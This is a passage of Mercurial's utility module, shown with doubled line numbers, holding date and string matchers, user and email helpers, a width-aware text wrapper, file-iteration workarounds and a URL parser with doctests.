2132 2131 raise Abort(_("invalid day spec, use '>DATE'"))
2133 2132 when = lower(date[1:])
2134 2133 return lambda x: x >= when
2135 2134 elif date[0] == "-":
2136 2135 try:
2137 2136 days = int(date[1:])
2138 2137 except ValueError:
2139 2138 raise Abort(_("invalid day spec: %s") % date[1:])
2140 2139 if days < 0:
2141 2140 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2142 2141 % date[1:])
2143 2142 when = makedate()[0] - days * 3600 * 24
2144 2143 return lambda x: x >= when
2145 2144 elif " to " in date:
2146 2145 a, b = date.split(" to ")
2147 2146 start, stop = lower(a), upper(b)
2148 2147 return lambda x: x >= start and x <= stop
2149 2148 else:
2150 2149 start, stop = lower(date), upper(date)
2151 2150 return lambda x: x >= start and x <= stop
2152 2151
2153 2152 def stringmatcher(pattern, casesensitive=True):
2154 2153 """
2155 2154 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2156 2155 returns the matcher name, pattern, and matcher function.
2157 2156 missing or unknown prefixes are treated as literal matches.
2158 2157
2159 2158 helper for tests:
2160 2159 >>> def test(pattern, *tests):
2161 2160 ... kind, pattern, matcher = stringmatcher(pattern)
2162 2161 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2163 2162 >>> def itest(pattern, *tests):
2164 2163 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2165 2164 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2166 2165
2167 2166 exact matching (no prefix):
2168 2167 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2169 2168 ('literal', 'abcdefg', [False, False, True])
2170 2169
2171 2170 regex matching ('re:' prefix)
2172 2171 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2173 2172 ('re', 'a.+b', [False, False, True])
2174 2173
2175 2174 force exact matches ('literal:' prefix)
2176 2175 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2177 2176 ('literal', 're:foobar', [False, True])
2178 2177
2179 2178 unknown prefixes are ignored and treated as literals
2180 2179 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2181 2180 ('literal', 'foo:bar', [False, False, True])
2182 2181
2183 2182 case insensitive regex matches
2184 2183 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2185 2184 ('re', 'A.+b', [False, False, True])
2186 2185
2187 2186 case insensitive literal matches
2188 2187 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2189 2188 ('literal', 'ABCDEFG', [False, False, True])
2190 2189 """
2191 2190 if pattern.startswith('re:'):
2192 2191 pattern = pattern[3:]
2193 2192 try:
2194 2193 flags = 0
2195 2194 if not casesensitive:
2196 2195 flags = remod.I
2197 2196 regex = remod.compile(pattern, flags)
2198 2197 except remod.error as e:
2199 2198 raise error.ParseError(_('invalid regular expression: %s')
2200 2199 % e)
2201 2200 return 're', pattern, regex.search
2202 2201 elif pattern.startswith('literal:'):
2203 2202 pattern = pattern[8:]
2204 2203
2205 2204 match = pattern.__eq__
2206 2205
2207 2206 if not casesensitive:
2208 2207 ipat = encoding.lower(pattern)
2209 2208 match = lambda s: ipat == encoding.lower(s)
2210 2209 return 'literal', pattern, match
2211 2210
2212 2211 def shortuser(user):
2213 2212 """Return a short representation of a user name or email address."""
2214 2213 f = user.find('@')
2215 2214 if f >= 0:
2216 2215 user = user[:f]
2217 2216 f = user.find('<')
2218 2217 if f >= 0:
2219 2218 user = user[f + 1:]
2220 2219 f = user.find(' ')
2221 2220 if f >= 0:
2222 2221 user = user[:f]
2223 2222 f = user.find('.')
2224 2223 if f >= 0:
2225 2224 user = user[:f]
2226 2225 return user
2227 2226
2228 2227 def emailuser(user):
2229 2228 """Return the user portion of an email address."""
2230 2229 f = user.find('@')
2231 2230 if f >= 0:
2232 2231 user = user[:f]
2233 2232 f = user.find('<')
2234 2233 if f >= 0:
2235 2234 user = user[f + 1:]
2236 2235 return user
2237 2236
2238 2237 def email(author):
2239 2238 '''get email of author.'''
2240 2239 r = author.find('>')
2241 2240 if r == -1:
2242 2241 r = None
2243 2242 return author[author.find('<') + 1:r]
2244 2243
2245 2244 def ellipsis(text, maxlength=400):
2246 2245 """Trim string to at most maxlength (default: 400) columns in display."""
2247 2246 return encoding.trim(text, maxlength, ellipsis='...')
2248 2247
2249 2248 def unitcountfn(*unittable):
2250 2249 '''return a function that renders a readable count of some quantity'''
2251 2250
2252 2251 def go(count):
2253 2252 for multiplier, divisor, format in unittable:
2254 2253 if abs(count) >= divisor * multiplier:
2255 2254 return format % (count / float(divisor))
2256 2255 return unittable[-1][2] % count
2257 2256
2258 2257 return go
2259 2258
2260 2259 def processlinerange(fromline, toline):
2261 2260 """Check that linerange <fromline>:<toline> makes sense and return a
2262 2261 0-based range.
2263 2262
2264 2263 >>> processlinerange(10, 20)
2265 2264 (9, 20)
2266 2265 >>> processlinerange(2, 1)
2267 2266 Traceback (most recent call last):
2268 2267 ...
2269 2268 ParseError: line range must be positive
2270 2269 >>> processlinerange(0, 5)
2271 2270 Traceback (most recent call last):
2272 2271 ...
2273 2272 ParseError: fromline must be strictly positive
2274 2273 """
2275 2274 if toline - fromline < 0:
2276 2275 raise error.ParseError(_("line range must be positive"))
2277 2276 if fromline < 1:
2278 2277 raise error.ParseError(_("fromline must be strictly positive"))
2279 2278 return fromline - 1, toline
2280 2279
2281 2280 bytecount = unitcountfn(
2282 2281 (100, 1 << 30, _('%.0f GB')),
2283 2282 (10, 1 << 30, _('%.1f GB')),
2284 2283 (1, 1 << 30, _('%.2f GB')),
2285 2284 (100, 1 << 20, _('%.0f MB')),
2286 2285 (10, 1 << 20, _('%.1f MB')),
2287 2286 (1, 1 << 20, _('%.2f MB')),
2288 2287 (100, 1 << 10, _('%.0f KB')),
2289 2288 (10, 1 << 10, _('%.1f KB')),
2290 2289 (1, 1 << 10, _('%.2f KB')),
2291 2290 (1, 1, _('%.0f bytes')),
2292 2291 )
2293 2292
2294 2293 # Matches a single EOL which can either be a CRLF where repeated CR
2295 2294 # are removed or a LF. We do not care about old Macintosh files, so a
2296 2295 # stray CR is an error.
2297 2296 _eolre = remod.compile(br'\r*\n')
2298 2297
2299 2298 def tolf(s):
2300 2299 return _eolre.sub('\n', s)
2301 2300
2302 2301 def tocrlf(s):
2303 2302 return _eolre.sub('\r\n', s)
2304 2303
2305 2304 if pycompat.oslinesep == '\r\n':
2306 2305 tonativeeol = tocrlf
2307 2306 fromnativeeol = tolf
2308 2307 else:
2309 2308 tonativeeol = pycompat.identity
2310 2309 fromnativeeol = pycompat.identity
2311 2310
2312 2311 def escapestr(s):
2313 2312 # call underlying function of s.encode('string_escape') directly for
2314 2313 # Python 3 compatibility
2315 2314 return codecs.escape_encode(s)[0]
2316 2315
2317 2316 def unescapestr(s):
2318 2317 return codecs.escape_decode(s)[0]
2319 2318
2320 2319 def forcebytestr(obj):
2321 2320 """Portably format an arbitrary object (e.g. exception) into a byte
2322 2321 string."""
2323 2322 try:
2324 2323 return pycompat.bytestr(obj)
2325 2324 except UnicodeEncodeError:
2326 2325 # non-ascii string, may be lossy
2327 2326 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2328 2327
2329 2328 def uirepr(s):
2330 2329 # Avoid double backslash in Windows path repr()
2331 2330 return repr(s).replace('\\\\', '\\')
2332 2331
2333 2332 # delay import of textwrap
2334 2333 def MBTextWrapper(**kwargs):
2335 2334 class tw(textwrap.TextWrapper):
2336 2335 """
2337 2336 Extend TextWrapper for width-awareness.
2338 2337
2339 2338 Neither number of 'bytes' in any encoding nor 'characters' is
2340 2339 appropriate to calculate terminal columns for specified string.
2341 2340
2342 2341 Original TextWrapper implementation uses built-in 'len()' directly,
2343 2342 so overriding is needed to use width information of each characters.
2344 2343
2345 2344 In addition, characters classified into 'ambiguous' width are
2346 2345 treated as wide in East Asian area, but as narrow in other.
2347 2346
2348 2347 This requires use decision to determine width of such characters.
2349 2348 """
2350 2349 def _cutdown(self, ucstr, space_left):
2351 2350 l = 0
2352 2351 colwidth = encoding.ucolwidth
2353 2352 for i in xrange(len(ucstr)):
2354 2353 l += colwidth(ucstr[i])
2355 2354 if space_left < l:
2356 2355 return (ucstr[:i], ucstr[i:])
2357 2356 return ucstr, ''
2358 2357
2359 2358 # overriding of base class
2360 2359 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2361 2360 space_left = max(width - cur_len, 1)
2362 2361
2363 2362 if self.break_long_words:
2364 2363 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2365 2364 cur_line.append(cut)
2366 2365 reversed_chunks[-1] = res
2367 2366 elif not cur_line:
2368 2367 cur_line.append(reversed_chunks.pop())
2369 2368
2370 2369 # this overriding code is imported from TextWrapper of Python 2.6
2371 2370 # to calculate columns of string by 'encoding.ucolwidth()'
2372 2371 def _wrap_chunks(self, chunks):
2373 2372 colwidth = encoding.ucolwidth
2374 2373
2375 2374 lines = []
2376 2375 if self.width <= 0:
2377 2376 raise ValueError("invalid width %r (must be > 0)" % self.width)
2378 2377
2379 2378 # Arrange in reverse order so items can be efficiently popped
2380 2379 # from a stack of chucks.
2381 2380 chunks.reverse()
2382 2381
2383 2382 while chunks:
2384 2383
2385 2384 # Start the list of chunks that will make up the current line.
2386 2385 # cur_len is just the length of all the chunks in cur_line.
2387 2386 cur_line = []
2388 2387 cur_len = 0
2389 2388
2390 2389 # Figure out which static string will prefix this line.
2391 2390 if lines:
2392 2391 indent = self.subsequent_indent
2393 2392 else:
2394 2393 indent = self.initial_indent
2395 2394
2396 2395 # Maximum width for this line.
2397 2396 width = self.width - len(indent)
2398 2397
2399 2398 # First chunk on line is whitespace -- drop it, unless this
2400 2399 # is the very beginning of the text (i.e. no lines started yet).
2401 2400 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2402 2401 del chunks[-1]
2403 2402
2404 2403 while chunks:
2405 2404 l = colwidth(chunks[-1])
2406 2405
2407 2406 # Can at least squeeze this chunk onto the current line.
2408 2407 if cur_len + l <= width:
2409 2408 cur_line.append(chunks.pop())
2410 2409 cur_len += l
2411 2410
2412 2411 # Nope, this line is full.
2413 2412 else:
2414 2413 break
2415 2414
2416 2415 # The current line is full, and the next chunk is too big to
2417 2416 # fit on *any* line (not just this one).
2418 2417 if chunks and colwidth(chunks[-1]) > width:
2419 2418 self._handle_long_word(chunks, cur_line, cur_len, width)
2420 2419
2421 2420 # If the last chunk on this line is all whitespace, drop it.
2422 2421 if (self.drop_whitespace and
2423 2422 cur_line and cur_line[-1].strip() == r''):
2424 2423 del cur_line[-1]
2425 2424
2426 2425 # Convert current line back to a string and store it in list
2427 2426 # of all lines (return value).
2428 2427 if cur_line:
2429 2428 lines.append(indent + r''.join(cur_line))
2430 2429
2431 2430 return lines
2432 2431
2433 2432 global MBTextWrapper
2434 2433 MBTextWrapper = tw
2435 2434 return tw(**kwargs)
2436 2435
2437 2436 def wrap(line, width, initindent='', hangindent=''):
2438 2437 maxindent = max(len(hangindent), len(initindent))
2439 2438 if width <= maxindent:
2440 2439 # adjust for weird terminal size
2441 2440 width = max(78, maxindent + 1)
2442 2441 line = line.decode(pycompat.sysstr(encoding.encoding),
2443 2442 pycompat.sysstr(encoding.encodingmode))
2444 2443 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2445 2444 pycompat.sysstr(encoding.encodingmode))
2446 2445 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2447 2446 pycompat.sysstr(encoding.encodingmode))
2448 2447 wrapper = MBTextWrapper(width=width,
2449 2448 initial_indent=initindent,
2450 2449 subsequent_indent=hangindent)
2451 2450 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2452 2451
2453 2452 if (pyplatform.python_implementation() == 'CPython' and
2454 2453 sys.version_info < (3, 0)):
2455 2454 # There is an issue in CPython that some IO methods do not handle EINTR
2456 2455 # correctly. The following table shows what CPython version (and functions)
2457 2456 # are affected (buggy: has the EINTR bug, okay: otherwise):
2458 2457 #
2459 2458 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2460 2459 # --------------------------------------------------
2461 2460 # fp.__iter__ | buggy | buggy | okay
2462 2461 # fp.read* | buggy | okay [1] | okay
2463 2462 #
2464 2463 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2465 2464 #
2466 2465 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2467 2466 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2468 2467 #
2469 2468 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2470 2469 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2471 2470 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2472 2471 # fp.__iter__ but not other fp.read* methods.
2473 2472 #
2474 2473 # On modern systems like Linux, the "read" syscall cannot be interrupted
2475 2474 # when reading "fast" files like on-disk files. So the EINTR issue only
2476 2475 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2477 2476 # files approximately as "fast" files and use the fast (unsafe) code path,
2478 2477 # to minimize the performance impact.
2479 2478 if sys.version_info >= (2, 7, 4):
2480 2479 # fp.readline deals with EINTR correctly, use it as a workaround.
2481 2480 def _safeiterfile(fp):
2482 2481 return iter(fp.readline, '')
2483 2482 else:
2484 2483 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2485 2484 # note: this may block longer than necessary because of bufsize.
2486 2485 def _safeiterfile(fp, bufsize=4096):
2487 2486 fd = fp.fileno()
2488 2487 line = ''
2489 2488 while True:
2490 2489 try:
2491 2490 buf = os.read(fd, bufsize)
2492 2491 except OSError as ex:
2493 2492 # os.read only raises EINTR before any data is read
2494 2493 if ex.errno == errno.EINTR:
2495 2494 continue
2496 2495 else:
2497 2496 raise
2498 2497 line += buf
2499 2498 if '\n' in buf:
2500 2499 splitted = line.splitlines(True)
2501 2500 line = ''
2502 2501 for l in splitted:
2503 2502 if l[-1] == '\n':
2504 2503 yield l
2505 2504 else:
2506 2505 line = l
2507 2506 if not buf:
2508 2507 break
2509 2508 if line:
2510 2509 yield line
2511 2510
2512 2511 def iterfile(fp):
2513 2512 fastpath = True
2514 2513 if type(fp) is file:
2515 2514 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2516 2515 if fastpath:
2517 2516 return fp
2518 2517 else:
2519 2518 return _safeiterfile(fp)
2520 2519 else:
2521 2520 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2522 2521 def iterfile(fp):
2523 2522 return fp
2524 2523
2525 2524 def iterlines(iterator):
2526 2525 for chunk in iterator:
2527 2526 for line in chunk.splitlines():
2528 2527 yield line
2529 2528
2530 2529 def expandpath(path):
2531 2530 return os.path.expanduser(os.path.expandvars(path))
2532 2531
2533 2532 def hgcmd():
2534 2533 """Return the command used to execute current hg
2535 2534
2536 2535 This is different from hgexecutable() because on Windows we want
2537 2536 to avoid things opening new shell windows like batch files, so we
2538 2537 get either the python call or current executable.
2539 2538 """
2540 2539 if mainfrozen():
2541 2540 if getattr(sys, 'frozen', None) == 'macosx_app':
2542 2541 # Env variable set by py2app
2543 2542 return [encoding.environ['EXECUTABLEPATH']]
2544 2543 else:
2545 2544 return [pycompat.sysexecutable]
2546 2545 return gethgcmd()
2547 2546
2548 2547 def rundetached(args, condfn):
2549 2548 """Execute the argument list in a detached process.
2550 2549
2551 2550 condfn is a callable which is called repeatedly and should return
2552 2551 True once the child process is known to have started successfully.
2553 2552 At this point, the child process PID is returned. If the child
2554 2553 process fails to start or finishes before condfn() evaluates to
2555 2554 True, return -1.
2556 2555 """
2557 2556 # Windows case is easier because the child process is either
2558 2557 # successfully starting and validating the condition or exiting
2559 2558 # on failure. We just poll on its PID. On Unix, if the child
2560 2559 # process fails to start, it will be left in a zombie state until
2561 2560 # the parent wait on it, which we cannot do since we expect a long
2562 2561 # running process on success. Instead we listen for SIGCHLD telling
2563 2562 # us our child process terminated.
2564 2563 terminated = set()
2565 2564 def handler(signum, frame):
2566 2565 terminated.add(os.wait())
2567 2566 prevhandler = None
2568 2567 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2569 2568 if SIGCHLD is not None:
2570 2569 prevhandler = signal.signal(SIGCHLD, handler)
2571 2570 try:
2572 2571 pid = spawndetached(args)
2573 2572 while not condfn():
2574 2573 if ((pid in terminated or not testpid(pid))
2575 2574 and not condfn()):
2576 2575 return -1
2577 2576 time.sleep(0.1)
2578 2577 return pid
2579 2578 finally:
2580 2579 if prevhandler is not None:
2581 2580 signal.signal(signal.SIGCHLD, prevhandler)
2582 2581
2583 2582 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2584 2583 """Return the result of interpolating items in the mapping into string s.
2585 2584
2586 2585 prefix is a single character string, or a two character string with
2587 2586 a backslash as the first character if the prefix needs to be escaped in
2588 2587 a regular expression.
2589 2588
2590 2589 fn is an optional function that will be applied to the replacement text
2591 2590 just before replacement.
2592 2591
2593 2592 escape_prefix is an optional flag that allows using doubled prefix for
2594 2593 its escaping.
2595 2594 """
2596 2595 fn = fn or (lambda s: s)
2597 2596 patterns = '|'.join(mapping.keys())
2598 2597 if escape_prefix:
2599 2598 patterns += '|' + prefix
2600 2599 if len(prefix) > 1:
2601 2600 prefix_char = prefix[1:]
2602 2601 else:
2603 2602 prefix_char = prefix
2604 2603 mapping[prefix_char] = prefix_char
2605 2604 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2606 2605 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2607 2606
2608 2607 def getport(port):
2609 2608 """Return the port for a given network service.
2610 2609
2611 2610 If port is an integer, it's returned as is. If it's a string, it's
2612 2611 looked up using socket.getservbyname(). If there's no matching
2613 2612 service, error.Abort is raised.
2614 2613 """
2615 2614 try:
2616 2615 return int(port)
2617 2616 except ValueError:
2618 2617 pass
2619 2618
2620 2619 try:
2621 2620 return socket.getservbyname(port)
2622 2621 except socket.error:
2623 2622 raise Abort(_("no port number associated with service '%s'") % port)
2624 2623
2625 2624 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2626 2625 '0': False, 'no': False, 'false': False, 'off': False,
2627 2626 'never': False}
2628 2627
2629 2628 def parsebool(s):
2630 2629 """Parse s into a boolean.
2631 2630
2632 2631 If s is not a valid boolean, returns None.
2633 2632 """
2634 2633 return _booleans.get(s.lower(), None)
2635 2634
2636 2635 _hextochr = dict((a + b, chr(int(a + b, 16)))
2637 2636 for a in string.hexdigits for b in string.hexdigits)
2638 2637
2639 2638 class url(object):
2640 2639 r"""Reliable URL parser.
2641 2640
2642 2641 This parses URLs and provides attributes for the following
2643 2642 components:
2644 2643
2645 2644 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2646 2645
2647 2646 Missing components are set to None. The only exception is
2648 2647 fragment, which is set to '' if present but empty.
2649 2648
2650 2649 If parsefragment is False, fragment is included in query. If
2651 2650 parsequery is False, query is included in path. If both are
2652 2651 False, both fragment and query are included in path.
2653 2652
2654 2653 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2655 2654
2656 2655 Note that for backward compatibility reasons, bundle URLs do not
2657 2656 take host names. That means 'bundle://../' has a path of '../'.
2658 2657
2659 2658 Examples:
2660 2659
2661 2660 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2662 2661 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2663 2662 >>> url('ssh://[::1]:2200//home/joe/repo')
2664 2663 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2665 2664 >>> url('file:///home/joe/repo')
2666 2665 <url scheme: 'file', path: '/home/joe/repo'>
2667 2666 >>> url('file:///c:/temp/foo/')
2668 2667 <url scheme: 'file', path: 'c:/temp/foo/'>
2669 2668 >>> url('bundle:foo')
2670 2669 <url scheme: 'bundle', path: 'foo'>
2671 2670 >>> url('bundle://../foo')
2672 2671 <url scheme: 'bundle', path: '../foo'>
2673 2672 >>> url(r'c:\foo\bar')
2674 2673 <url path: 'c:\\foo\\bar'>
2675 2674 >>> url(r'\\blah\blah\blah')
2676 2675 <url path: '\\\\blah\\blah\\blah'>
2677 2676 >>> url(r'\\blah\blah\blah#baz')
2678 2677 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2679 2678 >>> url(r'file:///C:\users\me')
2680 2679 <url scheme: 'file', path: 'C:\\users\\me'>
2681 2680
2682 2681 Authentication credentials:
2683 2682
2684 2683 >>> url('ssh://joe:xyz@x/repo')
2685 2684 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2686 2685 >>> url('ssh://joe@x/repo')
2687 2686 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2688 2687
2689 2688 Query strings and fragments:
2690 2689
2691 2690 >>> url('http://host/a?b#c')
2692 2691 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2693 2692 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2694 2693 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2695 2694
2696 2695 Empty path:
2697 2696
2698 2697 >>> url('')
2699 2698 <url path: ''>
2700 2699 >>> url('#a')
2701 2700 <url path: '', fragment: 'a'>
2702 2701 >>> url('http://host/')
2703 2702 <url scheme: 'http', host: 'host', path: ''>
2704 2703 >>> url('http://host/#a')
2705 2704 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2706 2705
2707 2706 Only scheme:
2708 2707
2709 2708 >>> url('http:')
2710 2709 <url scheme: 'http'>
2711 2710 """
2712 2711
2713 2712 _safechars = "!~*'()+"
2714 2713 _safepchars = "/!~*'()+:\\"
2715 2714 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2716 2715
2717 2716 def __init__(self, path, parsequery=True, parsefragment=True):
2718 2717 # We slowly chomp away at path until we have only the path left
2719 2718 self.scheme = self.user = self.passwd = self.host = None
2720 2719 self.port = self.path = self.query = self.fragment = None
2721 2720 self._localpath = True
2722 2721 self._hostport = ''
2723 2722 self._origpath = path
2724 2723
2725 2724 if parsefragment and '#' in path:
2726 2725 path, self.fragment = path.split('#', 1)
2727 2726
2728 2727 # special case for Windows drive letters and UNC paths
2729 2728 if hasdriveletter(path) or path.startswith('\\\\'):
2730 2729 self.path = path
2731 2730 return
2732 2731
2733 2732 # For compatibility reasons, we can't handle bundle paths as
2734 2733 # normal URLS
2735 2734 if path.startswith('bundle:'):
2736 2735 self.scheme = 'bundle'
2737 2736 path = path[7:]
2738 2737 if path.startswith('//'):
2739 2738 path = path[2:]
2740 2739 self.path = path
2741 2740 return
2742 2741
2743 2742 if self._matchscheme(path):
2744 2743 parts = path.split(':', 1)
2745 2744 if parts[0]:
2746 2745 self.scheme, path = parts
2747 2746 self._localpath = False
2748 2747
2749 2748 if not path:
2750 2749 path = None
2751 2750 if self._localpath:
2752 2751 self.path = ''
2753 2752 return
2754 2753 else:
2755 2754 if self._localpath:
2756 2755 self.path = path
2757 2756 return
2758 2757
2759 2758 if parsequery and '?' in path:
2760 2759 path, self.query = path.split('?', 1)
2761 2760 if not path:
2762 2761 path = None
2763 2762 if not self.query:
2764 2763 self.query = None
2765 2764
2766 2765 # // is required to specify a host/authority
2767 2766 if path and path.startswith('//'):
2768 2767 parts = path[2:].split('/', 1)
2769 2768 if len(parts) > 1:
2770 2769 self.host, path = parts
2771 2770 else:
2772 2771 self.host = parts[0]
2773 2772 path = None
2774 2773 if not self.host:
2775 2774 self.host = None
2776 2775 # path of file:///d is /d
2777 2776 # path of file:///d:/ is d:/, not /d:/
2778 2777 if path and not hasdriveletter(path):
2779 2778 path = '/' + path
2780 2779
2781 2780 if self.host and '@' in self.host:
2782 2781 self.user, self.host = self.host.rsplit('@', 1)
2783 2782 if ':' in self.user:
2784 2783 self.user, self.passwd = self.user.split(':', 1)
2785 2784 if not self.host:
2786 2785 self.host = None
2787 2786
2788 2787 # Don't split on colons in IPv6 addresses without ports
2789 2788 if (self.host and ':' in self.host and
2790 2789 not (self.host.startswith('[') and self.host.endswith(']'))):
2791 2790 self._hostport = self.host
2792 2791 self.host, self.port = self.host.rsplit(':', 1)
2793 2792 if not self.host:
2794 2793 self.host = None
2795 2794
2796 2795 if (self.host and self.scheme == 'file' and
2797 2796 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2798 2797 raise Abort(_('file:// URLs can only refer to localhost'))
2799 2798
2800 2799 self.path = path
2801 2800
2802 2801 # leave the query string escaped
2803 2802 for a in ('user', 'passwd', 'host', 'port',
2804 2803 'path', 'fragment'):
2805 2804 v = getattr(self, a)
2806 2805 if v is not None:
2807 2806 setattr(self, a, urlreq.unquote(v))
2808 2807
2809 2808 def __repr__(self):
2810 2809 attrs = []
2811 2810 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2812 2811 'query', 'fragment'):
2813 2812 v = getattr(self, a)
2814 2813 if v is not None:
2815 2814 attrs.append('%s: %r' % (a, v))
2816 2815 return '<url %s>' % ', '.join(attrs)
2817 2816
2818 2817 def __bytes__(self):
2819 2818 r"""Join the URL's components back into a URL string.
2820 2819
2821 2820 Examples:
2822 2821
2823 2822 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2824 2823 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2825 2824 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2826 2825 'http://user:pw@host:80/?foo=bar&baz=42'
2827 2826 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2828 2827 'http://user:pw@host:80/?foo=bar%3dbaz'
2829 2828 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2830 2829 'ssh://user:pw@[::1]:2200//home/joe#'
2831 2830 >>> str(url('http://localhost:80//'))
2832 2831 'http://localhost:80//'
2833 2832 >>> str(url('http://localhost:80/'))
2834 2833 'http://localhost:80/'
2835 2834 >>> str(url('http://localhost:80'))
2836 2835 'http://localhost:80/'
2837 2836 >>> str(url('bundle:foo'))
2838 2837 'bundle:foo'
2839 2838 >>> str(url('bundle://../foo'))
2840 2839 'bundle:../foo'
2841 2840 >>> str(url('path'))
2842 2841 'path'
2843 2842 >>> str(url('file:///tmp/foo/bar'))
2844 2843 'file:///tmp/foo/bar'
2845 2844 >>> str(url('file:///c:/tmp/foo/bar'))
2846 2845 'file:///c:/tmp/foo/bar'
2847 2846 >>> print url(r'bundle:foo\bar')
2848 2847 bundle:foo\bar
2849 2848 >>> print url(r'file:///D:\data\hg')
2850 2849 file:///D:\data\hg
2851 2850 """
2852 2851 if self._localpath:
2853 2852 s = self.path
2854 2853 if self.scheme == 'bundle':
2855 2854 s = 'bundle:' + s
2856 2855 if self.fragment:
2857 2856 s += '#' + self.fragment
2858 2857 return s
2859 2858
2860 2859 s = self.scheme + ':'
2861 2860 if self.user or self.passwd or self.host:
2862 2861 s += '//'
2863 2862 elif self.scheme and (not self.path or self.path.startswith('/')
2864 2863 or hasdriveletter(self.path)):
2865 2864 s += '//'
2866 2865 if hasdriveletter(self.path):
2867 2866 s += '/'
2868 2867 if self.user:
2869 2868 s += urlreq.quote(self.user, safe=self._safechars)
2870 2869 if self.passwd:
2871 2870 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2872 2871 if self.user or self.passwd:
2873 2872 s += '@'
2874 2873 if self.host:
2875 2874 if not (self.host.startswith('[') and self.host.endswith(']')):
2876 2875 s += urlreq.quote(self.host)
2877 2876 else:
2878 2877 s += self.host
2879 2878 if self.port:
2880 2879 s += ':' + urlreq.quote(self.port)
2881 2880 if self.host:
2882 2881 s += '/'
2883 2882 if self.path:
2884 2883 # TODO: similar to the query string, we should not unescape the
2885 2884 # path when we store it, the path might contain '%2f' = '/',
2886 2885 # which we should *not* escape.
2887 2886 s += urlreq.quote(self.path, safe=self._safepchars)
2888 2887 if self.query:
2889 2888 # we store the query in escaped form.
2890 2889 s += '?' + self.query
2891 2890 if self.fragment is not None:
2892 2891 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2893 2892 return s
2894 2893
2895 2894 __str__ = encoding.strmethod(__bytes__)
2896 2895
2897 2896 def authinfo(self):
2898 2897 user, passwd = self.user, self.passwd
2899 2898 try:
2900 2899 self.user, self.passwd = None, None
2901 2900 s = bytes(self)
2902 2901 finally:
2903 2902 self.user, self.passwd = user, passwd
2904 2903 if not self.user:
2905 2904 return (s, None)
2906 2905 # authinfo[1] is passed to urllib2 password manager, and its
2907 2906 # URIs must not contain credentials. The host is passed in the
2908 2907 # URIs list because Python < 2.4.3 uses only that to search for
2909 2908 # a password.
2910 2909 return (s, (None, (s, self.host),
2911 2910 self.user, self.passwd or ''))
2912 2911
2913 2912 def isabs(self):
2914 2913 if self.scheme and self.scheme != 'file':
2915 2914 return True # remote URL
2916 2915 if hasdriveletter(self.path):
2917 2916 return True # absolute for our purposes - can't be joined()
2918 2917 if self.path.startswith(br'\\'):
2919 2918 return True # Windows UNC path
2920 2919 if self.path.startswith('/'):
2921 2920 return True # POSIX-style
2922 2921 return False
2923 2922
2924 2923 def localpath(self):
2925 2924 if self.scheme == 'file' or self.scheme == 'bundle':
2926 2925 path = self.path or '/'
2927 2926 # For Windows, we need to promote hosts containing drive
2928 2927 # letters to paths with drive letters.
2929 2928 if hasdriveletter(self._hostport):
2930 2929 path = self._hostport + '/' + self.path
2931 2930 elif (self.host is not None and self.path
2932 2931 and not hasdriveletter(path)):
2933 2932 path = '/' + path
2934 2933 return path
2935 2934 return self._origpath
2936 2935
2937 2936 def islocal(self):
2938 2937 '''whether localpath will return something that posixfile can open'''
2939 2938 return (not self.scheme or self.scheme == 'file'
2940 2939 or self.scheme == 'bundle')
2941 2940
2942 2941 def hasscheme(path):
2943 2942 return bool(url(path).scheme)
2944 2943
